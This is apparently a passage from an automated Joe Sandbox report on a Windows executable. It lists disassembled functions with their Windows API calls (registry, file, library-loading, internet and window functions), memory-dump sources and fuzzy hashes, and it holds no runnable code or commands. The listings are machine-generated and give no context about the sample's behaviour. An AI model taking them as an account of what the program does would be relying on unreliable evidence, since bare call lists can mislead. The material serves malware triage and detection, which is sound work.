                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 3488606520-0
                                                                  • Opcode ID: 750257d56dcd6d9bbec2f44ec763546f14719b3768a0f3517b85bb3ee499e103
                                                                  • Instruction ID: 9877b6b93ed83034f25723ce73a65cb5ee27510da13a7b3e84fb8bb535c9d4ad
                                                                  • Opcode Fuzzy Hash: 750257d56dcd6d9bbec2f44ec763546f14719b3768a0f3517b85bb3ee499e103
                                                                  • Instruction Fuzzy Hash: D1A1AEB1A047019FE760EF24C886B2AB7E2AF48710F14881DF5999B392D771EC418F86
                                                                  Function 006AC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC505
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006AC560
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006AC5C3
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 006AC606
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AC613
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 826366716-0
                                                                  • Opcode ID: 582b078ff9c1a9ae2f962dbd7992c3ecc3fbfd52b1bf1d85404a3ba4f5518b7b
                                                                  • Instruction ID: 8fea5e48126cb7feddabeca719c280f2adff020ba261936dd40c3371f433bdc8
                                                                  • Opcode Fuzzy Hash: 582b078ff9c1a9ae2f962dbd7992c3ecc3fbfd52b1bf1d85404a3ba4f5518b7b
                                                                  • Instruction Fuzzy Hash: 4161C371608641AFC714EF14C890E6ABBE6FF85318F14959CF09A8B292DB31ED46CF91
                                                                  Function 0068ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0068D7CD,?), ref: 0068E714
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0068D7CD,?), ref: 0068E72D
                                                                    • Part of subcall function 0068EAB0: GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0068ED8A
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0068EDC3
                                                                  • _wcslen.LIBCMT ref: 0068EF02
                                                                  • _wcslen.LIBCMT ref: 0068EF1A
                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0068EF67
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3183298772-0
                                                                  • Opcode ID: b5d754da214ca019a71bc155ef2bc1b178ecacf0317ef7ef20b379ac2438a522
                                                                  • Instruction ID: 39db557fdd46954c3651a55e7ab828ad041760f509a2a136e83900c375245c22
                                                                  • Opcode Fuzzy Hash: b5d754da214ca019a71bc155ef2bc1b178ecacf0317ef7ef20b379ac2438a522
                                                                  • Instruction Fuzzy Hash: AE5198B25087849BC764EB50DC919DB73EEEF85300F000A2EF285D3151EF31A68C8B6A
                                                                  Function 00689517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00689534
                                                                  • VariantClear.OLEAUT32 ref: 006895A5
                                                                  • VariantClear.OLEAUT32 ref: 00689604
                                                                  • VariantClear.OLEAUT32(?), ref: 00689677
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006896A2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                  • String ID:
                                                                  • API String ID: 4136290138-0
                                                                  • Opcode ID: 45dba5f18f550fa82f76164472bcef6133032a64af0045f377c0446cc56e4e48
                                                                  • Instruction ID: 170f9f5f179d15ba5d70b3492300de4959dc2fbc79ce885a4fd80b19ef6d7e5e
                                                                  • Opcode Fuzzy Hash: 45dba5f18f550fa82f76164472bcef6133032a64af0045f377c0446cc56e4e48
                                                                  • Instruction Fuzzy Hash: BF514AB5A00219EFDB14DF58C884AAAB7F9FF89314B158659E905DB310E730E951CFA0
                                                                  Function 00699540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006995F3
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0069961F
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00699677
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0069969C
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006996A4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                  • String ID:
                                                                  • API String ID: 2832842796-0
                                                                  • Opcode ID: dd4d8d1d0a2f085913d8d4eaa1e841bc34052100c1e5f856e4c6c7d2da5e3e34
                                                                  • Instruction ID: 6f3552b6844dccb3a62eff38f8ee93a91c4a70a9d62012afbac623faae3a9e63
                                                                  • Opcode Fuzzy Hash: dd4d8d1d0a2f085913d8d4eaa1e841bc34052100c1e5f856e4c6c7d2da5e3e34
                                                                  • Instruction Fuzzy Hash: 4F512935A006259FDF05DF64C881AAABBF6FF48314F058058E949AB3A2CB35ED41CF94
                                                                  Function 006A9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 006A999D
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 006A9A2D
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 006A9A49
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 006A9A8F
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 006A9AAF
                                                                    • Part of subcall function 0063F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00691A02,?,7529E610), ref: 0063F9F1
                                                                    • Part of subcall function 0063F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00680354,00000000,00000000,?,?,00691A02,?,7529E610,?,00680354), ref: 0063FA18
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                  • String ID:
                                                                  • API String ID: 666041331-0
                                                                  • Opcode ID: 2ecd40e50ed98b2655e19b76ae83f83cbdf465dce6fd0175c63609ca96b60201
                                                                  • Instruction ID: 421d2793ccca64b0a7070c54ed79e0097f4ac8932b4910be390dc8f6b00f7bda
                                                                  • Opcode Fuzzy Hash: 2ecd40e50ed98b2655e19b76ae83f83cbdf465dce6fd0175c63609ca96b60201
                                                                  • Instruction Fuzzy Hash: 09514A35A00615DFCB00EF68C48499DBBF2FF0A314B1981A9E9069B762D731ED86CF91
                                                                  Function 006B75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 006B766B
                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 006B7682
                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 006B76AB
                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0069B5BE,00000000,00000000), ref: 006B76D0
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 006B76FF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MessageSendShow
                                                                  • String ID:
                                                                  • API String ID: 3688381893-0
                                                                  • Opcode ID: e56e242837ecd93e2ff0d555639508e0624996ade0f25f542fc5eb8454611376
                                                                  • Instruction ID: 8f88cbdfdc3b747f00d14778c79c07dc3f1eba48527ac2ea0973bc2f8f03233b
                                                                  • Opcode Fuzzy Hash: e56e242837ecd93e2ff0d555639508e0624996ade0f25f542fc5eb8454611376
                                                                  • Instruction Fuzzy Hash: 3441C1B5A08504AFD7258F2CCC49FE57BA7EB89350F150264F819AB3E0E670EE91DB50
                                                                  Function 006523C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: 03b4a17853c60726384c8618765627949dc3c401d541252ba185e7ef3a6218e9
                                                                  • Instruction ID: c35e71cdab623981d8d1103622479e2aa5575795e315ba4f151f39dd0c43a30d
                                                                  • Opcode Fuzzy Hash: 03b4a17853c60726384c8618765627949dc3c401d541252ba185e7ef3a6218e9
                                                                  • Instruction Fuzzy Hash: 3441D232A002119FDB20DF78C891A9EB3F6EF8A314F1545A8E915EB351D731AD05CB80
                                                                  Function 0068224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00682262
                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 0068230E
                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00682316
                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00682327
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0068232F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: ee4147f222ed0e500f09ad37e1f432ac95bff18aa6826f1729a7c700bc3fb705
                                                                  • Instruction ID: 53c6d705c59da5f8a7243171f2c4d0bcdacebc623b442ff37364e6e48612ca99
                                                                  • Opcode Fuzzy Hash: ee4147f222ed0e500f09ad37e1f432ac95bff18aa6826f1729a7c700bc3fb705
                                                                  • Instruction Fuzzy Hash: 9C31F4B190021AEFDB04DFA8CD98ADE3BB6EB04315F004329F921EB2D1D7709A40CB90
                                                                  Function 0069D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0069CC63,00000000), ref: 0069D97D
                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 0069D9B4
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,0069CC63,00000000), ref: 0069D9F9
                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0069CC63,00000000), ref: 0069DA0D
                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0069CC63,00000000), ref: 0069DA37
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                  • String ID:
                                                                  • API String ID: 3191363074-0
                                                                  • Opcode ID: 0c258a4a37390ec8d00fd2ed2fdaeaea8d8f9ac1cdc1a7d1cf755f1f31c50fc7
                                                                  • Instruction ID: e18872ae17662edf2ff44ecad69d4c8971f9f1d3bb7d2985485c226710555484
                                                                  • Opcode Fuzzy Hash: 0c258a4a37390ec8d00fd2ed2fdaeaea8d8f9ac1cdc1a7d1cf755f1f31c50fc7
                                                                  • Instruction Fuzzy Hash: 2C312C71504205EFDF24EFA5D885AAAB7FEEB04354B10443EE546D7650E730EE41DB60
                                                                  Function 006B61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 006B61E4
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 006B623C
                                                                  • _wcslen.LIBCMT ref: 006B624E
                                                                  • _wcslen.LIBCMT ref: 006B6259
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B62B5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 763830540-0
                                                                  • Opcode ID: 771933dafac6519c233c82863ebd90f27ff60f74b8c9a0e180196c7dd545f578
                                                                  • Instruction ID: 65e61e3d6806d5f6df0dd17d70b4eaf1af180a900a1642ad65544dda42c87b27
                                                                  • Opcode Fuzzy Hash: 771933dafac6519c233c82863ebd90f27ff60f74b8c9a0e180196c7dd545f578
                                                                  • Instruction Fuzzy Hash: 662185B19002189BDB209F54CC84AEEB7BEFF04314F144256FA25EB280DB7499C5CF51
                                                                  Function 006A138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 006A13AE
                                                                  • GetForegroundWindow.USER32 ref: 006A13C5
                                                                  • GetDC.USER32(00000000), ref: 006A1401
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 006A140D
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 006A1445
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: eface8eac1f50aa924b259d00c80ed49f4abe38f97ec35036af883135e912118
                                                                  • Instruction ID: 48e00795ff3cab66c110466d142ecfe35fc1dd69056df14eff3781b4b3263f8f
                                                                  • Opcode Fuzzy Hash: eface8eac1f50aa924b259d00c80ed49f4abe38f97ec35036af883135e912118
                                                                  • Instruction Fuzzy Hash: 2421AE76A00214AFDB44EF69D894A9EB7FAEF49340F04843DE84A9B751DA30AC44CF90
                                                                  Function 0065D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0065D146
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0065D169
                                                                    • Part of subcall function 00653B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0065D18F
                                                                  • _free.LIBCMT ref: 0065D1A2
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0065D1B1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                  • String ID:
                                                                  • API String ID: 336800556-0
                                                                  • Opcode ID: f645adcc394266073ff70d05134c3954f51722b6485e3e4f400f8b9b05faa328
                                                                  • Instruction ID: 3e5d073c7c9ab2ebfd066398c39bb4966d4dc04b78bb7823b57dfcb070e343d3
                                                                  • Opcode Fuzzy Hash: f645adcc394266073ff70d05134c3954f51722b6485e3e4f400f8b9b05faa328
                                                                  • Instruction Fuzzy Hash: 48018876601A157F3331667A5C4CD7B6A6FDEC3BA2714022DFD04C6384EA608D0982B0
                                                                  Function 0065316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(0000000A,?,?,0064F64E,0064545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00653170
                                                                  • _free.LIBCMT ref: 006531A5
                                                                  • _free.LIBCMT ref: 006531CC
                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 006531D9
                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 006531E2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  • Opcode ID: 79b2e7f0dd3c24bdb52e97096c20724c4358d9e0dd21f0794b47832784fa4f27
                                                                  • Instruction ID: a0c21fa8ea20fa31e3766bc4c3a2d55831c1ad2ca4647fa8a5ce00f11709d91c
                                                                  • Opcode Fuzzy Hash: 79b2e7f0dd3c24bdb52e97096c20724c4358d9e0dd21f0794b47832784fa4f27
                                                                  • Instruction Fuzzy Hash: 1901F976640F217B973226349C85DAB356BAFD2BF3F20052CFC15D6382FE218A0E5154
                                                                  Function 006808FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?,?,00680C4E), ref: 0068091B
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680936
                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680944
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?), ref: 00680954
                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680960
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
